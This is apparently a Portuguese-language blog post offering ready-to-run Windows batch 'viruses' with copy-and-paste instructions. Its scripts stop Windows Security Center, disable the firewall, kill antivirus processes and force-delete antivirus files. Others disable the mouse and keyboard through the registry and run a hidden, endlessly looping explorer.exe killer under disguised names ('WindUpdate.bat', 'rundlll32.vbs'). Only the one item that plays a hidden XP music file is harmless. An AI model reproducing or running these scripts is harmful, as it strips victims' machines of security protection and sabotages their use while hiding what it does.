Menu

Virus em .bat

Virus em batch (.bat) e suas Funções! – Parte 01

Virus em Batch e suas funções!
Bom pessoal nesse primeiro artigo que escrevo sobre batch script (.bat) estarei disponibilizando alguns codigos e explicando  suas funções.

AV Killer:  Esse codigo abaixo ao ser executado, Desativara a Central de Segurança do windows Xp, e Removerá praticamente todos os antivirus que estiverem instalados no sistema.
Como Usar: Copie o codigo abaixo e cole no bloco de notas e salve com a extensão .bat.  Exemplo: Avkill.bat.
@echo off
 
avkiller
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Arquivos de programas\alwils~1\avast4\*.*
del /Q /F C:\Arquivos de programas\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Arquivos de programas\kasper~1\*.exe
cls
del /Q /F C:\Arquivos de programas\trojan~1\*.exe
del /Q /F C:\Arquivos de programas\f-prot95\*.dll
del /Q /F C:\Arquivos de programas\tbav\*.dat
cls
del /Q /F C:\Arquivos de programas\avpersonal\*.vdf
del /Q /F C:\Arquivos de programas\Norton~1\*.cnt
del /Q /F C:\Arquivos de programas\Mcafee\*.*
cls
del /Q /F C:\Arquivos de programas\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Arquivos de programas\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Arquivos de programas\Norton~1\Norton~1\*.*
del /Q /F C:\Arquivos de programas\Norton~1\*.*
cls
del /Q /F C:\Arquivos de programas\avgamsr\*.exe
del /Q /F C:\Arquivos de programas\avgamsvr\*.exe
del /Q /F C:\Arquivos de programas\avgemc\*.exe
cls
del /Q /F C:\Arquivos de programas\avgcc\*.exe
del /Q /F C:\Arquivos de programas\avgupsvc\*.exe
del /Q /F C:\Arquivos de programas\grisoft
del /Q /F C:\Arquivos de programas\nood32krn\*.exe
del /Q /F C:\Arquivos de programas\nood32\*.exe
cls
del /Q /F C:\Arquivos de programas\nod32
del /Q /F C:\Arquivos de programas\nood32
del /Q /F C:\Arquivos de programas\kav\*.exe
del /Q /F C:\Arquivos de programas\kavmm\*.exe
del /Q /F C:\Arquivos de programas\kaspersky\*.*
cls
del /Q /F C:\Arquivos de programas\ewidoctrl\*.exe
del /Q /F C:\Arquivos de programas\guard\*.exe
del /Q /F C:\Arquivos de programas\ewido\*.exe
cls
del /Q /F C:\Arquivos de programas\pavprsrv\*.exe
del /Q /F C:\Arquivos de programas\pavprot\*.exe
del /Q /F C:\Arquivos de programas\avengine\*.exe
cls
del /Q /F C:\Arquivos de programas\apvxdwin\*.exe
del /Q /F C:\Arquivos de programas\webproxy\*.exe
del /Q /F C:\Arquivos de programas\panda software\*.*
::---------------------------::
Iniciar música WinXP: Esse codigo abaixo ao ser executado,  Começa a tocar uma musica escondida do windows XP.
Como Usar: Copie o codigo abaixo e cole no bloco de notas e salve com a extensão .bat.  Exemplo: Musica.bat
@echo off
 
::--Iniciar musica escondia WinXP--::
cd "C:\Windows\system32\oobe\images"
start title.wma
Desativar Mouse: Esse codigo abaixo ao ser executado, Remove a chave de registro do mouse e cria outra com a opção de desativalo.

Como Usar: Copie o codigo abaixo e cole no bloco de notas e salve com a extensão .bat.  Exemplo: DesativarMouse.bat
::-------Desativar Mouse-------::
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
::---------------------------::
Desativar Teclado: Esse codigo abaixo ao ser executado, Desabilita o registro do Teclado, fazendo assim com que ele não funcione.
Como Usar: Copie o codigo abaixo e cole no bloco de notas e salve com a extensão .bat.  Exemplo: DesativarTeclado.bat
@echo off
 
::------Desativar Teclado-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::---------------------------::
(Mata) Fecha e Desativa o Explorer.exe : Esse codigo abaixo ao ser executado, Fecha o processo Explorer.exe e cria um arquivo .Vbs com a opção de não deixar o explorer.exe ser iniciado.
Como Usar: Copie o codigo abaixo e cole no bloco de notas e salve com a extensão .bat.  Exemplo: DesativarExplorer.exe
@echo off
 
::-----Matar Explorer.exe-----::
echo :a >>WindUpdate.bat
echo tskill explorer >>WindUpdate.bat
echo goto a >>WindUpdate.bat
echo Set objShell = CreateObject("WScript.Shell")>>rundlll32.vbs
echo strCommand = "WindUpdate.bat">>rundlll32.vbs
echo objShell.Run strCommand, vbHide, TRUE>>rundlll32.vbs
start "" rundlll32.vbs
::---------------------------::
Postado por Gdk Informatica às 19:59
Marcadores:

0 comentários: sobre Virus em .bat

Postar um comentário para Virus em .bat:

Assinar: Postar comentários